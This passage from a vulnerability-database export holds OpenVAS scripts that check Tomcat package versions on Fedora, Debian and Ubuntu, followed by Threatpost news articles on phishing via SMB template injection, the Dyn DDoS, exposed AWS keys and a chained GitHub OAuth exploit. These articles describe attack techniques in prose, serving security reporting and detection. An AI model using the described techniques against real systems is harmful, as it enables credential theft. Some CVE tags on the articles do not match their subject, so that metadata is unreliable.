Servlet and JavaServer Pages technologies.\nThe Java Servlet and JavaServer Pages specifications are developed by\nSun under the Java Community Process.\n\nTomcat is developed in an open and participatory environment and\nreleased under the Apache Software License version 2.0. Tomcat is intended\nto be a collaboration of the best-of-breed developers from around the world.\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.5.35~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-08T12:58:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-12-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4596-1 (tomcat8 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12418", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-17563", "CVE-2018-11784", "CVE-2019-0221"], "modified": "2019-12-29T00:00:00", "id": "OPENVAS:1361412562310704596", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704596", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704596\");\n script_version(\"2019-12-29T03:00:16+0000\");\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-29 03:00:16 +0000 (Sun, 29 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-12-29 03:00:16 +0000 (Sun, 29 Dec 2019)\");\n script_name(\"Debian Security Advisory DSA 4596-1 (tomcat8 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4596.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4596-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the DSA-4596-1 advisory.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several issues were discovered in the Tomcat servlet and JSP engine, which\ncould result in session fixation attacks, information disclosure, cross-site\nscripting, denial of service via resource exhaustion and insecure\nredirects.\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 8.5.50-0+deb9u1. This update also requires an updated version\nof tomcat-native which has been updated to 1.2.21-1~deb9u1.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-05T00:00:00", "type": "openvas", "title": "Ubuntu Update for tomcat8 USN-3665-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15706", "CVE-2018-1304", "CVE-2018-8014", "CVE-2018-1305", "CVE-2017-12617", "CVE-2017-12616"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310843539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843539", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3665_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for tomcat8 USN-3665-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843539\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-05 14:03:23 +0530 (Tue, 05 Jun 2018)\");\n script_cve_id(\"CVE-2017-12616\", \"CVE-2017-12617\", \"CVE-2017-15706\", \"CVE-2018-1304\",\n \"CVE-2018-1305\", \"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for tomcat8 USN-3665-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Tomcat incorrectly\nhandled being configured with HTTP PUTs enabled. A remote attacker could use\nthis issue to upload a JSP file to the server and execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-12616, CVE-2017-12617)\n\nIt was discovered that Tomcat contained incorrect documentation regarding\ndescription of the search algorithm used by the CGI Servlet to identify\nwhich script to execute. This issue only affected Ubuntu 17.10.\n(CVE-2017-15706)\n\nIt was discovered that Tomcat incorrectly handled en empty string URL\npattern in security constraint definitions. 
A remote attacker could\npossibly use this issue to gain access to web application resources,\ncontrary to expectations. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1304)\n\nIt was discovered that Tomcat incorrectly handled applying certain security\nconstraints. A remote attacker could possibly access certain resources,\ncontrary to expectations. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1305)\n\nIt was discovered that the Tomcat CORS filter default settings were\ninsecure and would enable 'supportsCredentials' for all origins, contrary\nto expectations. (CVE-2018-8014)\");\n script_tag(name:\"affected\", value:\"tomcat8 on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3665-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3665-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.52-1ubuntu0.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.52-1ubuntu0.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.21-1ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.21-1ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.30-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.30-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.6\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.6\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. 
These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. 
That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. 
\u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. 
\u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. 
Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source was overseas hackers targeting U.S. cyber infrastructure. 
He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Mirai.\u201d\n\nSecurity firm Flashpoint also identified Mirai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principal security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms of IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. 
However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exacerbated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. 
\n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Bala.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. 
Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Github and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>)_ quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. 
Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his 
site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability Homakov noticed in Github was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by inputting a /../ path traversal. A path traversal attack allows files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on the real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. 
Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked for automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. 
As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the 